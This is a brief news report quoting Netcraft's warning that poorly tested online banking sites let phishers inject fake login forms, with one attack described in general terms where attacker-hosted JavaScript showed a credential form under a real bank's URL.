Web consultant Netcraft has warned that many large banks
are neglecting to take sufficient care with the development and
testing of their online banking facilities, and as a result are
leaving their customers open to phishing attacks.
Netcraft said, "Well known banks have created an infestation of
application bugs and vulnerabilities across the internet, allowing
fraudsters to insert their data collection forms into bona fide
banking sites, and creating convincing frauds that are undetectable
to most customers."
Netcraft said its concerns about the continued threat of
phishing attacks on customers of big banks were triggered by a
large number of reports on the scams from users of its security
toolbar, which automatically detects new security threats.
Netcraft said its Toolbar recently blocked a phishing attack on
an online bank in which the fraudsters composed and mass-mailed a
phishing mail that exploited a program on the bank’s website.
Through the attack, Javascript from the attackers' server
presented the bank’s customers with a page bearing the bank’s URL
in the address bar, while the browser window displayed a form sent
by the hacker’s server asking for user login information.